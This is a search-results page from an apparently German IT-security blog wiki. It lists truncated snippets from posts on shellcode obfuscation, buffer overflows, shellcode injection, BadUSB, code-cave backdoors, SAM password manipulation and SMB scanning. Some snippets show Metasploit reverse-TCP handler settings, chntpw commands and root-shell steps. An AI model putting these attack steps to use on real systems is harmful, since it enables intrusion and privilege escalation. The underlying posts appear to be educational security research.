Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Volltextergebnisse:
- Obfuscation: polymorpher In-Memory Decoder @it-security:blog
- en Register umbenannt werden mussten. Der Decoder startet mit dieser Anweisung: <code asm> _start: jmp short call_decoder ; Begin of JMP-CALL-POP </co... ans Ziel: <code asm [enable_line_numbers="true",start_line_numbers_at="26"]> xor rax, rax mov al, 60h m... ändern in: <code asm [enable_line_numbers="true",start_line_numbers_at="26"]> xor rax, rax mov rax, gs:[
- FatCat Attack PoC @it-security:blog
- AV deaktivieren - Payload erstellen - handler starten - BadUSB Angriff - RemoteShell nutzen zum E... rantonline.medium.com/flipper-zero-badusb-getting-started-with-duckyscript-f212fcdd5dec)) | | ::: | Bypas... === ==== Metasploit Payload ==== * Metasploit starten * cmd öffnen <code dos>cmd</code> * Paylo... Metasploit Handler ==== * Multi Handler Server starten <code ruby> use exploit/multi/handler set payl
- Privilegien-Eskalation: Windows-Admin dank Linux @it-security:blog
- USB Stick oder eine DVD portiertieren. Damit der Startvorgang fehlerfrei läuft solltet ihr im Bios folge... henfolge auf das entsprechende Medium ändern Nun startet ihr Lubuntu und konfiguriert noch folgendes: ... \\ ===== Manipulation des SAM ===== ==== chntpw starten ==== Jetzt wird es Zeit unser eben installiertes Tool zu starten. <code bash> sudo chntpw -i SAM </code> \\ \\
- Backdoor development with Code Caves @it-security:blog
- e Size: 4027 byte. [*] Start Address: 0x80005654 [*] En... in </code> ===== 4.0 Code Hijacking ===== Let's start the disassembler! We should initiate a [[Backdoor... handler set lhost 0.0.0.0 set lport 6699 run [*] Started reverse TCP handler on 0.0.0.0:6699 </code> ==== 5.2 Start the backdoor ==== - Run the backdoor - Enter
- Buffer Overflow im 64-Bit Stack - Teil 2 @it-security:blog
- en 2 Gadgets, um das Exploit zu erstellen. Hierzu starten wir ropper und lassen uns die Gadgets anzeigen ... . Also laden wir unsere Datei in den Debugger und starten: <code bash> gdb-peda$ start ... gdb-peda$ p system $1 = {int (const char *)} 0x7ffff7e17920 <__libc_... bof-part2 </code> \\ \\ ==== root Shell ==== Nun starten wir unser Programm und übergeben unseren Buffer
- Buffer Overflow im 64-Bit Stack - Teil 3 @it-security:blog
- {{page>vorlagen:attention}} ==== socat Listener starten ==== Das mitgelieferte socat besitzt Mechanism... process 105836 Mapped address spaces: Start Addr End Addr Size Offset Pe... pwntools Optimierungen und automatisiertem socat Start ist im [[gh>psycore8/nosoc-bof/tree/main/part-3|G... com/a/48571747)) \\ \\ ==== root Shell ==== Wir starten socat und bof-part3 als root <code bash> su ro
- Shellcode Injection Teil 1 @it-security:blog
- er}}] \\ \\ ==== Metasploit vorbereiten ==== Nun starten wir einen Handler in Metasploit, der die Revers... 61.130 msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 172.23.61.130:445 </code> \\ \\ ==== Shellcode ausführen ==== Wir starten jetzt ''Inject.exe'', betrachten die Ausgabe in... Projekt ein und setzen die Makroanweisungen, zum Starten und Beenden der Code-Verschleierung. <code c++
- Shellcode Injection Teil 3 @it-security:blog
- BS Datei aus. Wir wollen jedoch ein Python Script starten, welches eine Meterpreter Shell erzeugt. Hierzu... => 4500 resource (/home/kali/nosoc3.rc)> run [*] Started reverse TCP handler on 0.0.0.0:4500 </code> Nun ist alles bereit. \\ \\ ==== Angriff ==== Starten wir nun das Programm auf dem Ziel PC. {{:it-se... elprogramm hierzu gibt es auch im Repository. Zum Starten muss die Ziel PID als Argument übergeben werden
- nmap SMBv1 Scan via Script
- king if SMBv1 is supported") status, smbstate = start(host) if(status == false) then return false... SMBv1 and close connection status, smbstate = start(host) if(status == false) then return false... king the responses" end end </code> ===== Scan starten ===== <code bash> nmap -p139,445 --script smbv
- Obfuscation: ByteSwapping @it-security:blog
- tialisierung und JMP-CALL-POP === <code stylus> _start: xor rax, rax xor rbx, rbx xor rcx, r... hon shencode.py extract -i poly2.o -o poly2.raw --start-offset 100 --end-offset 404 </code> * Dann ext... mpilierung des Injecters können wir mit dem Debug starten. Ich nutze hierbei x64dbg. {{:it-security:blog
- Shellcode Injection Teil 4 @it-security:blog
- Anforderungen sollten hierbei erfüllt sein: * Start von ''calc.exe'' auf einem Windows Rechner * 64... nun nötig, um ''calc.exe'' aus einem Shellcode zu starten? - ''kernel32.dll'' Basis Adresse finden -... ==== kernel32.dll Basis Adresse ==== Mit jedem Start eines Prozesses in Windows, werden Module in dies
- Host Discovery mit Metasploit Datenbank
- ruby> msf6 > db_nmap -sP 192.168.2.0/24 [*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-29 2... r/portscan/tcp) > hosts -R </code> ==== Portscan starten ==== <code ruby> msf6 auxiliary(scanner/ports
- SMB Hardening
- {{tag>deutsch startpage it-security windows active-directory}} ====== SMB Hardening ====== ===== Technis... ntifizierung kann man auf dem Server eine Session starten und Daten entwenden. Die SMB-Signierung ordnet
- Buffer Overflow im 64-Bit Stack - Teil 1 @it-security:blog
- ir herausfinden, wie wir dies machen können. Wir starten unser Programm im Debugger und generieren einen... tzen wir root Rechte auf die vulnerable Datei und starten diese((https://blog.techorganic.com/2015/04/10/
- Obfuscation: Shellcode als UUIDs tarnen @it-security:blog
- t testen ===== ==== Metasploit handler ==== Wir starten einen Metasploit Handler auf dem Angriffs-Syste... /shell/reverse_tcp lhost=0.0.0.0 lport=15666 [*] Started reverse TCP handler on 0.0.0.0:15666 </code> =